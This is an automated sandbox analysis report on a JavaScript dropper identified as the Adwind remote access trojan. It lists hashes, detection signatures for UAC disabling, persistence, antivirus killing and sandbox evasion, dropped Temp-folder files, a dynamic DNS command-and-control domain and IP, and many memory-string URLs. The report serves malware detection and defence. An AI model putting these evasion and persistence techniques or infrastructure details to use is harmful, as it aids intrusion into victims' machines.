Windows Analysis Report
gcahfpmhcn.js

Overview

General Information

Sample name: gcahfpmhcn.js
Analysis ID: 1426956
MD5: 5bca887380e1881f351c22574d257e41
SHA1: 987634d53966aa6e84c72ad366bb78e619cb674a
SHA256: 5f4b5467cccbbc2f2c5771d9547e7fca350df341d154f4d83a4442b7a44cdf06
Tags: adwindjs

Detection

ADWIND
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Detected ADWIND Rat
JScript performs obfuscated calls to suspicious functions
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Yara detected AdWind RAT
Yara detected AdWind RATs dll
Creates a Image File Execution Options (IFEO) Debugger entry
Creates an undocumented autostart registry key
Disable UAC(promptonsecuredesktop)
Disables UAC (registry)
Disables Windows system restore
Disables zone checking for all users
Excessive usage of taskkill to terminate processes
Exploit detected, runtime environment starts unknown processes
Found suspicious ZIP file
Java source code contains strings found in CrossRAT
JavaScript source code contains functionality to generate code involving a shell, file or stream
Sigma detected: Adwind RAT / JRAT File Artifact
Sigma detected: Potential Attachment Manager Settings Associations Tamper
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses dynamic DNS services
Uses regedit.exe to modify the Windows registry
Windows Scripting host queries suspicious COM object (likely to drop second stage)
AV process strings found (often used to terminate AV products)
Add executable type to lowriskfiletypes to avoid warning prompt
Binary contains a suspicious time stamp
Changes image file execution options
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
JavaScript source code contains large arrays or strings with random content potentially encoding malicious code
PE file contains sections with non-standard names
PE file does not import any functions
Queries the installed Java version
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Shell Process Spawned by Java.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara signature match

Classification

AV Detection

Source: C:\Users\user\AppData\Local\Temp\Retrive8340316412854535662.vbs Avira: detection malicious, Label: VBS/Antiav.jre
Source: C:\Users\user\AppData\Local\Temp\Retrive4143913798509633277.vbs Avira: detection malicious, Label: VBS/Antiav.jre
Source: C:\Users\user\AppData\Local\Temp\Windows197633722729995093.dll Avira: detection malicious, Label: TR/Spy.Agent.lusda
Source: C:\Users\user\AppData\Local\Temp\Retrive4329570775648502228.vbs Avira: detection malicious, Label: VBS/Agent.281
Source: C:\Users\user\AppData\Local\Temp\Retrive6110391193418258336.vbs Avira: detection malicious, Label: VBS/Agent.281
Source: C:\Users\user\AppData\Local\Temp\Windows197633722729995093.dll ReversingLabs: Detection: 85%
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\README.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\SysWOW64\xcopy.exe File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt

Software Vulnerabilities

Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\System32\conhost.exe
Source: gcahfpmhcn.js Return value : ['"adodb.stream"']

Networking

Source: unknown DNS query: name: pnauco5.ddns.net
Source: global traffic TCP traffic: 192.168.2.4:49744 -> 103.151.123.225:5000
Source: Joe Sandbox View ASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown DNS traffic detected: queries for: pnauco5.ddns.net
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/g3
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotations9
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotationsS_
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/generate-synthetic-annotationsmen9
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocations
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocations;
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/honour-all-schemaLocationsmpl
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/include-comments
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/include-comments3K
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/parser-settings
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/parser-settings7
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/parser-settings;
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicates
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatesO
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/tolerate-duplicatespacheO
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-only/
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/internal/validation/schema/use-grammar-pool-onlye/
Source: java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/namespace-growth
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/namespace-growthS2
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, xcopy.exe, 00000012.00000003.1856312997.0000000002823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtd:
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/nonvalidating/load-external-dtdch:
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs7
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refsnterna7
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs/3
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs3
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/standard-uri-conformant
Source: java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/standard-uri-conformantom2
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validate-annotations
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validate-annotations;
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validate-annotationsTextI;
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validate-annotationsk
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees
Source: java.exe, 00000004.00000002.2957859802.0000000015182000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807982473.000000001517B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015146000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treesl
Source: javaw.exe, 00000001.00000002.2961037370.0000000014CA0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799970452.0000000014CE6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treesre1
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treess
Source: javaw.exe, 00000001.00000002.2961037370.0000000014CA0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799970452.0000000014CE6000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015182000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807982473.000000001517B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.0000000015146000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/dynamic
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checking
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checking/sun/F
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checkingF
Source: java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/identity-constraint-checking
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/identity-constraint-checkinges
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000003.1807345523.000000001510D000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957547371.000000001512C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking=
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checkingin=
Source: java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvi
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psviint
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/element-default
Source: java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/element-defaultC$
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/element-defaultO
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdecl
Source: javaw.exe, 00000001.00000002.2961037370.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799237253.0000000014DC7000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799693718.0000000014E24000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000001.00000003.1799791461.0000000014E3A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdecl/A
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdeclA
Source: javaw.exe, 00000001.00000002.2956709894.00000000099EE000.00000004.00000800.00020000.00000000.sdmp, java.exe, java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2955123520.0000000009EAA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2948370667.0000000004C46000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-value
Source: java.exe, 00000004.00000003.1807345523.0000000015248000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000004.00000002.2957859802.0000000015248000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valueB
